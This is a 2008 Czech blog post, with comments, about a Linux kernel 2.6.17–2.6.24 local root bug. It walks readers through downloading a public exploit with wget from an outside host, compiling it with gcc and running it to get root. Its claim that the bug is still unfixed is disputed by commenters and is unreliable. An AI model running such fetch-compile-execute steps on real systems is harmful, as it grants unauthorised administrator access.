CrazyDog ~ Multi-blog

Je Linux opravdu bezpečný? Ála root bez hesla

St, 27. únor 2008, 16:21

Je to sice starší bezpečnostní chyba v Linuxu, ale přesto je stále aktuální a dodnes neopravená. Touto bezpečnostní chybou se může obyčejný uživatel přepnout do administrátorského režimu bez zadáni hesla. Chyba se objevila u Jadra verze 2.6.17 a trvá do dnešní verze 2.6.24. Ve verzi 2.6.20 tato trhlinka byla nějak odkloněna, pravděpodobně nedopatřením a v dalších verzích je chyba zase raritou.

A nyní jak se do root režimu dostat. Otevřete si terminál a zadáním uname -a zjistíte jakou verzi Jadra má vaše distribuce. U mě se jedna o verzi 2.6.24 vydanou 7.února 2008.

Linux ubuntu 2.6.24-7-generic #1 SMP Thu Feb 7 01:29:58 UTC 2008 i686 GNU/Linux

Zadáním whoami do terminálu vám vypíše jméno přihlášeného uživatele a nyní se přihlaste jako root bez hesla stažením exploitu:

wget -nv http://www.securityfocus.com/data/vulnerabilities/exploits/27704.c
gcc 27704.c
./a.out

A nyní zkuste zadat do terminálu whoami a měl by vám vypsat „root“ a to znamená, že jste přihlášeny jako root a máte veškerá administrátorské práva.

Jestliže používáte Linux jen pro svou potřebu a nevlastníte žádný veřejný server či internetovou kavárnu, tak vám žádné nebezpečí nehrozí a pokud patříte k těm nešťastlivcům, tak doporučují přejít na starší verzi 2.6.20 anebo počkat na novější verzi u které budete doufat, že bude tato chyba opravená.

≈

ø 3 (1555 hlasů) ≈ Návratnost

(CrazyDog mánie fotogra...) « Starší článek | Novější článek » (Orkán Emma i ve vašem ...)

Související články

Hodnocení

Děkuji za hodnocení

Štítky: Ubuntu, problém, zobrazit všechny štítky
! Našli jste v článku gramatické či pravopisné chyby? Je to z důvodu autorovy nemoci zvané dysgrafie. Tudíž všem děkuji za pochopení a každý článek pokud možno nechávám projít korekturou. !

Zatím 6 komentářů

reaguj - #486onionve St, 27. únor 2008, 17:47

Chyba samozrejme opravena byla a to kratce po jejim uverejneni (uverejnena v sobotu, oprava resp. nove jadro k dispozici v pondeli).

Opera 9.50 / Linux

web - reaguj - #489Petrve Čt, 28. únor 2008, 13:09

*1*
---
Je to sice starší bezpečnostní chyba v Linuxu, ale přesto je stále aktuální a dodnes neopravená.
---
Uz davno opravena, jak uz psal i onion.
Dam ti account na server kde je 2.6.18 a zkus to a nic mi to neudela

IceWeasel 2.0.0.12 / Debian Linux

reaguj - #509o5ve Čt, 20. březen 2008, 22:31

to Petr:
nevim teda, ale prijde mi, ze autor clanku napsal, ze do v2.6.20 tento bug neni…tudiz nechapu tu vetu s 2.6.18
jinak jsem to zkusil u sebe (2.6.22-14) a taky tu chybku ma (kernel).
*21*

Firefox 2.0.0.11 / Ubuntu Linux

web - reaguj - #650Freezyv Pá, 6. únor 2009, 21:15

tak chyba se netýká jen bubuntu, ale obecně kernelu do .24 *12*

btw na většině koumpů jsem přešel na unstable *21*

Opera 9.63 / Linux

web - reaguj - #654CrazyDog muž

v Pá, 6. únor 2009, 22:44

Freezy: Já nepsal na Ubuntu, ale na Linuxu. Ubuntu jsem vzal jen pro test.

Firefox 3.0.5 / Ubuntu Linux

web - reaguj - #659Freezyv Pá, 6. únor 2009, 23:08

{1} co se týče toho exploitu, týká se to kernelů obecně, ale platí to jen pokud máš ten někdo přístup ke kompu fyzicky nebo přes ssh, teoreticky by to šlo spustit i phpčkem, ale tohle nemám vyzkoušeno, jinak pokud nemáš otevřené zbytečně porty co nepoužíváš, tak by problém být neměl *21*

Opera 9.63 / Linux